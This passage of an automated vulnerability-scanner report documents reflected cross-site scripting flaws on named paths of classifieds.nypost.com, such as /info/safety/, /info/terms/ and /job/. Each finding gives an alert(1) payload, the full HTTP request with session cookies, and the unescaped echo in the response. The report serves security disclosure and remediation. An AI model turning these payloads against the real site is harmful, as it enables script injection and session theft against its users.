Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:59 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5OTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/info88b48"><script>alert(1)</script>09070aae295/safety/" />
...[SNIP]...

1.177. http://www.classifieds.nypost.com/info/safety/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /info/safety/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86b8f"-alert(1)-"6f8a308ae1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /info86b8f"-alert(1)-"6f8a308ae1/safety/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:25:00 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds info86b8f"-alert(1)-"6f8a308ae1/safety/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.178. http://www.classifieds.nypost.com/info/safety/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /info/safety/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc634"><script>alert(1)</script>febe38143e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /info/safety/?cc634"><script>alert(1)</script>febe38143e2=1 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:24:58 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5ODt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11595

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/info/safety/?cc634"><script>alert(1)</script>febe38143e2=1" />
...[SNIP]...

1.179. http://www.classifieds.nypost.com/info/safety/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /info/safety/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f01e"-alert(1)-"2f9eda3b7a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /info/safety/?8f01e"-alert(1)-"2f9eda3b7a1=1 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:24:59 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5OTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
-_-nypost-_-info-_--_--_--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-info-_-info-_--_-nypost-_-USA-_-nypost-_-info-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreatePageviewTag("info safety/?8f01e"-alert(1)-"2f9eda3b7a1=1","10000017","","","ny-_-info-_-info-_-nypost USA-_-nypost-_-USA-_-nypost-_-info-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.180. http://www.classifieds.nypost.com/info/terms/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /info/terms/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ffbb"><script>alert(1)</script>6d47608e417 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /info9ffbb"><script>alert(1)</script>6d47608e417/terms/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:25:02 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/info9ffbb"><script>alert(1)</script>6d47608e417/terms/" />
...[SNIP]...

1.181. http://www.classifieds.nypost.com/info/terms/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /info/terms/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9588"-alert(1)-"65e27638775 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /infob9588"-alert(1)-"65e27638775/terms/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:25:03 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds infob9588"-alert(1)-"65e27638775/terms/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.182. http://www.classifieds.nypost.com/info/terms/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /info/terms/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8489a"-alert(1)-"278be8544e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /info/terms/?8489a"-alert(1)-"278be8544e7=1 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:25:01 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
A-_-nypost-_-info-_--_--_--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-info-_-info-_--_-nypost-_-USA-_-nypost-_-info-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreatePageviewTag("info terms/?8489a"-alert(1)-"278be8544e7=1","10000017","","","ny-_-info-_-info-_-nypost USA-_-nypost-_-USA-_-nypost-_-info-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.183. http://www.classifieds.nypost.com/info/terms/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /info/terms/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7481b"><script>alert(1)</script>6b562b3adf8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /info/terms/?7481b"><script>alert(1)</script>6b562b3adf8=1 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:25:00 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/info/terms/?7481b"><script>alert(1)</script>6b562b3adf8=1" />
...[SNIP]...

1.184. http://www.classifieds.nypost.com/job/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /job/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95829"-alert(1)-"fccefdfad6d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /job95829"-alert(1)-"fccefdfad6d/ HTTP/1.1
Host: www.classifieds.nypost.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=3ba3b7OvjvD-WrLvxgh; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:21:33 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=55c90344576e14be8dc5585a4805b2a0; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=b1044dc84aedcbd19e91b822fa4212a0; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1DMDRBRkRENTRDRjAxNkNE; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjg5Mzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
_--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds job95829"-alert(1)-"fccefdfad6d/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.185. http://www.classifieds.nypost.com/job/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /job/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e558c"><script>alert(1)</script>30e5e0450f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jobe558c"><script>alert(1)</script>30e5e0450f6/ HTTP/1.1
Host: www.classifieds.nypost.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=3ba3b7OvjvD-WrLvxgh; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:21:33 GMT
